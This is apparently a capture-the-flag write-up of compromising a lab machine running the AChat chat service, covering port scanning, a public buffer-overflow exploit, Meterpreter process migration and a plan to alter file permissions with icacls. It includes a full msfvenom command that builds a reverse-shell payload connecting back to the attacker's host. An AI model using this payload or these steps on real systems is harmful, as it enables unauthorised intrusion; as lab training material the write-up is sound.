Finding an open port on this one was murderous, super slow, small groups of nmap scans 1000 ports at a time was the way to discover that the ONLY open port (so far, at least), was 9256.
Further enumeration of that port (nmap –sC –sS –A –p 9256 10.10.10.74):
PORT STATE SERVICE VERSION
9256/tcp open achat AChat chat system
Googling for achat exploits, since that’s literally all I’ve got to go on, yields: https://www.exploit-db.com/exploits/36025/
I changed the shellcode in that to:
msfvenom -a x86 –platform Windows -p windows/shell/reverse_tcp RHOST=10.10.10.74 LHOST=10.10.14.11 LPORT=4443 exitfunc=thread -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python
I ran the exploit, and it appears to complete, but I never get a shell back.
I tried it again using a simple windows/shell/reverse_tcp payload, still nothing. My assumption was that Meterpreter was just too much and I needed something simpler, and I’m still pretty sure that’s correct. I did a fresh reset on the box since it had been 4 days, and got back:
So, now, it’s connecting back, but dying after like 10 seconds. I kept thinking this HAD to work, but none of my commands would execute. I tried several variations, and what finally worked (with enough time to run ONE command), was using the meterpreter payload, and the multi/handler to catch it.
Unfortunately, I could only run one command, so I had to make it count. I created the connection, and used ps to list processes, identifying the PID of explorer.exe. My assumption was something running on the box that was killing unauthorized processes, so if I could mgirate to that before it killed it, I might be able to sustain a connection.
Ran the exploit again, but this time used migrate to get to the PID of explorer. Exe. The connection was stable from here on out.
Finally. I am in as user Alfred, and I navigate to his desktop to retrieve the user.txt file.
I can also navigate TO the desktop of the Administrator, but cannot read the root.txt. I need to determine privesc here. It’s not even really privesc, because I clearly already have some higher level privs than a usual user would have. But this file has different permissions that don’t allow me to read it.
There’s a tool in windows that allows you to change the permissions on files from the CLI – icacls. Since the shell dumped me out in a high priv folder (system32), and I can at least get TO root.txt, I figured I’ve probably got the permissions to change the file and grab the hash.